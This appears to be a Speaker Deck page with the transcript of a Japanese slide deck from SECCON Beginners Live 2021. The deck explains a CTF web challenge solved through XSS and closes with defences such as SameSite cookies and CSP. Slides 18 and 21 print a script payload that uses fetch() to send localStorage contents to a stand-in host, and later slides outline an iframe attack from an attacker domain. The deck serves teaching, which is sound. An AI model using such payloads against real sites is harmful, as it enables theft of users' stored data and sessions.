Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

Hi120ki
October 17, 2021
Technology
0
1k

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/

Hi120ki

October 17, 2021
Tweet

More Decks by Hi120ki

See All by Hi120ki
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.3k

Other Decks in Technology

See All in Technology
新卒1年目、はじめてのアプリケーションサーバー【IBM WebSphere Liberty】
ktgrryt
0
140
JAWS-UG20250116_iOSアプリエンジニアがAWSreInventに行ってきた(真面目編)
totokit4
0
140
【Oracle Cloud ウェビナー】2025年のセキュリティ脅威を読み解く:リスクに備えるためのレジリエンスとデータ保護
oracle4engineer
PRO
1
100
Cloudflareで実現する AIエージェント ワークフロー基盤
kmd09
0
290
[IBM TechXchange Dojo]Watson Discoveryとwatsonx.aiでRAGを実現!座学①
siyuanzh09
0
110
「人物ごとのアルバム」の精度改善の軌跡/Improving accuracy of albums by person
mixi_engineers
PRO
1
110
三菱電機で社内コミュニティを立ち上げた話
kurebayashi
1
360
いま現場PMのあなたが、 経営と向き合うPMになるために 必要なこと、腹をくくること
hiro93n
9
7.8k
【JAWS-UG大阪 reInvent reCap LT大会 サンバが始まったら強制終了】“1分”で初めてのソロ参戦reInventを数字で振り返りながら反省する
ttelltte
0
140
Docker Desktop で Docker を始めよう
zembutsu
PRO
0
180
Reactフレームワークプロダクトを
モバイルアプリにして、もっと便利に。 ユーザに価値を届けよう。/React Framework with Capacitor
rdlabo
0
130
あなたの人生も変わるかも?AWS認定2つで始まったウソみたいな話
iwamot
3
860

Featured

See All Featured
Scaling GitHub
holman
459
140k
For a Future-Friendly Web
brad_frost
176
9.5k
How to Think Like a Performance Engineer
csswizardry
22
1.3k
Bash Introduction
62gerente
610
210k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
226
22k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
26
1.9k
Rails Girls Zürich Keynote
gr2m
94
13k
Mobile First: as difficult as doing things right
swwweet
222
9k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
8
1.2k
Build The Right Thing And Hit Your Dates
maggiecrowley
33
2.5k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
10
870

Transcript

  1. Magic Web SECCON Beginners Live 2021 hi120ki

  2. @hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :

    firmware Web : json, magic

  3. Web Magic 3

  4. Magic [Web Hard] : 31solve Web 5 • • 4

  5. 5 /

  6. 6 /

  7. 7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  8. 8 / URL

  9. 9 /

  10. 10 crawler/index.js puppeteer Node.js Chrome URL

  11. 11 2. FLAG 3. URL crawler/index.js 1.

  12. 12 FLAG nginx/html/static/index.js FLAG

  13. 13 FLAG JavaScript XSS( )

  14. XSS 14 HTML Web HTML JavaScript Cookie Web

  15. 15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG

  16. 16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>

  17. 17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????

  18. 18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL

  19. XSS 19 magic/views/index.ejs <script> </script>

  20. 20 alert(1)

  21. 21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>

  22. 22 FLAG URL

  23. 23 XSS https://magic.quals.beginners.seccon.jp/

  24. 24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS

  25. 25 ... + = ? XSS

  26. 26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG

  27. 27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  28. 28 URL

  29. 29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS

  30. 30 FLAG 1. FLAG 2. 3.

  31. 31

  32. 1. XSS 2. 3. 32

  33. 1. XSS 2. 3. 33 FLAG

  34. 1. XSS 2. 3. 34

  35. 1. XSS 2. 3. 35

  36. 36 FLAG

  37. XSS • • Byte Bandits CTF 2020 Notes App •

    https://github.com/ByteBandits/bbctf-2020 37

  38. Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •

    FLAG iframe • • API

  39. iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL

    iframe

  40. iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe

  41. iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS

    FLAG

  42. iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)

    <script>...</script>

  43. 43 iframe SameSite Cookie None Lax

  44. 44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)

    FLAG

  45. 45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)

    FLAG

  46. SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie

    (session=nj49gn...) ✕ FLAG <script>...</script>

  47. 47 SameSite Cookie=None iframe CTF

  48. 48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (

    XSS Content-Security-Policy )

  49. 49 FLAG +

  50. 50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup

    https://hi120ki.github.io/blog/posts/20210523-3/